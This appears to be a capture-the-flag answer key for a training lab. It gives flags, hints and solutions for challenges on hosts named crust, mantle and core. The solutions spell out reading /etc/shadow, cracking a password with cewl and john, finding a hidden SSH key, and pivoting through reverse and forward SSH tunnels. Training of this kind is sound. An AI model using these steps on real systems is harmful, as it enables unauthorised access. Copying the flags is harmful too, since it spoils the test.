master
1
2Discovery 101
3COG{17507e07-2f39-4b36-8843-bf304ee3ad1d}
410pts
5In a large tome this flag is tightly bound. It isn't worth much because it's easily found. COG{}
6Hint (1pt): soluton `grep COG *.txt`
7
8Access 101
9COG{17599eef-f2e6-4509-a2f2-c08d342134c7}
10100pts
11A single user system this is not. Can you crack the code and untie the knot?
12Hint (1pt): hint: `sudo cat /etc/passwd`
13Hint (1pt): hint: `sudo cat /etc/shadow`
14Hint (1pt): hint: axel is your mark and john is your friend
15Hint (1pt): hint: There sure are a lot of WORDS in this book. Make sure to not PASS your eyes over all of them
16Hint (1pt): hint: Make a wordlist from heimskringla.txt, wouldnt that be cewl?
17Hint (1pt): hint: Make sure to avoid the strong hash used for the 'student' user (65600 cycles is not fast)
18Hint (5pt): solution:
19```
20 sudo apt install cewl john
21 python -m SimpleHTTPServer &
22 cewl localhost:8000/heimskringla.txt -w words
23 sudo cat /etc/shadow | grep axel > axel-hash.txt
24 sudo john --wordlist=words axel-hash.txt
25 su axel # password from john
26```
27
28Access 102
29COG{175ae80e-051e-467f-8b0d-ee224af54574}
30100pts
31Wax on, Wax off. SSH in, logout. Like sands through an hourglass these sessions come and go as fast as they were created.
32Hint (1pt): hint: Watch for sessions coming or going from this machine
33Hint (1pt): hint: Network (or socket) statistics or packet dumping are both great ways to find connections of interest
34Hint (1pt): hint:
35```
36 watch -n1 -d ss -antp
37```
38or
39```
40 sudo tcpdump -ni ens3 not port 2222 and ip
41```
42Hint (5pt): solution: `ssh to axel@c2t2-000-crust -p 1863`
43
44
45Discovery 201
46Preq: Access 102
47COG{1750b2c3-a053-4c68-9da8-26e4a6ade0d7}
48100pts
49Find the ssh private key hidden on crust. The professor thought it was punny to hide his key in a "shared" file
50Hint (1pt): hint: A shared library or shared object is a file that is intended to be shared by executable files and further shared object files.
51Hint (1pt): hint: You will need to `find` the file somewhere on the filesystem. `proc` and `sys` can be ignored.
52Hint (1pt): hint: Filter out all the .so files which have the `file` types that is expected
53Hint (1pt): hint: When you you find the key the flag will be inside the key (`man ssh-keygen`)
54Hint (5pt): solution: this is an example solution, there are lots of possibilites:
55
56`find / -type f 2>/dev/null | grep ".so$" | xargs -I {} -P0 file {} | egrep -v "ELF|ASCII|python|terminfo"`
57`ssh-keygen -l -f <FILE>`
58
59Access 201
60Preq: Access 102
61COG{17515afd-0444-4779-891a-e70607e2b3de}
62Prof is like a ghost, but whoever finds him needent boast. Just ssh to his favorite host!
63Hint (1pt): hint: you may need to update the hostname that you find in the key (`c2t2-000-<hostname>`)
64Hint (5pt): solution: ssh lindenbrock@c2t2-000-mantle -i <FILE FOUND IN Discovery 201>
65
66Discovery 202
67Preq: Access 102
68COG{1754b4be-80ce-4bba-ae5d-56c6cabde758}
69Host enumeration is hard, good thing we dont have to clean these logs.
70Hint (1pt): hint: Evaluating the logs on a system is critical in understanding what system is being used for
71Hint (1pt): hint: Read and understand the `rsyslog` configuration file
72Hint (1pt): hint: Look for any logs which might be arriving from a remote hosts
73Hint (5pt): solution: `sudo grep COG /var/log/c2t2-*`
74
75Tunnels 301
76Preq: Access 201
77COG{17576080-45d6-4b9f-9084-533ca9710548}
78Looks like the Prof has `mantle` locked down tight, maybe that remote log could shed some light.
79hint: Looks like something is knocking, knocking on this bastion door
80hint: Maybe it's a message, coming from the core
81hint: Just because you can't get a login shell on this box doesn't mean ssh ins't useful! What else can we do with ssh?
82hint: What is different about the sshd config which is coming back from mantle?
83hint: `man ssh` is your friend. I like the `-N` and the `-T` flags the most. Also something something `GatewayPorts`
84hint: Use the netstat output, which is also getting logged, to troubleshoot a port forward, what direction should a port forward go?
85hint: Reverse ssh port forwarding: `-R <remote listening interface IP>:<remote listening port>:<local interface IP>:<local port>`
86hint: `-R 0.0.0.0:1337:localhost:1337 -v`
87hint: Don't forget to setup something to listen for the inbound connection, `netcat` is always fun.
88hint: on crust (separate window): `nc -l -p 1337`
89solution: `ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -R 0.0.0.0:1337:localhost:1337 -v`
90
91
92Tunnels 302
93Preq: Tunnels 301
94COG{175be632-d86a-46b2-93b9-a60e565fb4db}
95After all this journey I hope the the payoff is worth the effort. On the other side of this tunnel it all looked so easy.
96Step inside the computer world...
97hint: make sure to use the correct hostname and port to get to core -- via mantle
98hint: Port forwarding works in the forward direction too, just not with the letter `F` -- it's `L` because the listening happens locally (not Remote listen like with Reverse forwarding, `R`))
99hint: Forward ssh port forwarding: `-L <local listen ip>:<local listen port>:<remote target ip>:<remote target port>`
100hint: `-L 22175:c2t2-000-core:22175 -v`
101solution:
102`ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -L 22175:c2t2-001-core:22175 -v`
103`ssh localhost -p 22175`
104(flag shown after you die)
105
106COG{1758a9e1-22ae-4d41-8916-ccc98ec0edbf} - FEEDBACK FLAG Hidden and only given after the survey has been taken